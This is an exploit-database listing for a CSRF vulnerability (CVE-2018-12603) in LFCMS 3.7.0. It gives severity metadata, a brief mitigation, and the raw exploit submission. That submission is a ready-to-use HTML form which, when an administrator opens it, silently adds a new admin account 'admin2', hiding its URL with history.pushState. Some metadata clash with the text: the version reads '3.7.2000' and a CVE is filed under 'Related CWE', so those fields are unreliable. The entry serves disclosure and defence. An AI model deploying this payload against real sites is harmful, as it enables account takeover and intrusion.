header-logo
Suggest Exploit
vendor:
LFCMS
by:
bay0net
8.8
CVSS
HIGH
CSRF
352
CWE
Product Name: LFCMS
Affected Version From: 3.7.2000
Affected Version To: 3.7.2000
Patch Exists: NO
Related CWE: CVE-2018-12603
CPE: a:lfcms:lfcms:3.7.0
Metasploit:
Other Scripts:
Platforms Tested:
2018

A CSRF vulnerability exists in LFCMS_3.7.0: administrator account can be added arbitrarily.

A CSRF vulnerability exists in LFCMS_3.7.0 where an administrator account can be added arbitrarily. The payload for the attack is a HTML form that submits a request to add a new administrator account.

Mitigation:

To mitigate this vulnerability, implement proper CSRF protection mechanisms such as using CSRF tokens, checking the referrer header, and verifying user actions.
Source

Exploit-DB raw data:

# Exploit Title: A CSRF vulnerability exists in LFCMS_3.7.0: administrator account can be added arbitrarily.
# Date: 2018-06-20
# Exploit Author: bay0net
# Vendor Homepage: https://www.cnblogs.com/v1vvwv/p/9203899.html
# Software Link: http://www.lfdycms.com/home/down/index/id/26.html
# Version: 3.7.0
# CVE : CVE-2018-12603


A CSRF vulnerability exists in LFCMS_3.7.0:  administrator account can be added arbitrarily.


The payload for attack is as follows.


<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.211.55.17/lfdycms3.7.0/admin.php?s=/Member/add.html" method="POST">
      <input type="hidden" name="username" value="admin2" />
      <input type="hidden" name="password" value="admin2" />
      <input type="hidden" name="repassword" value="admin2" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>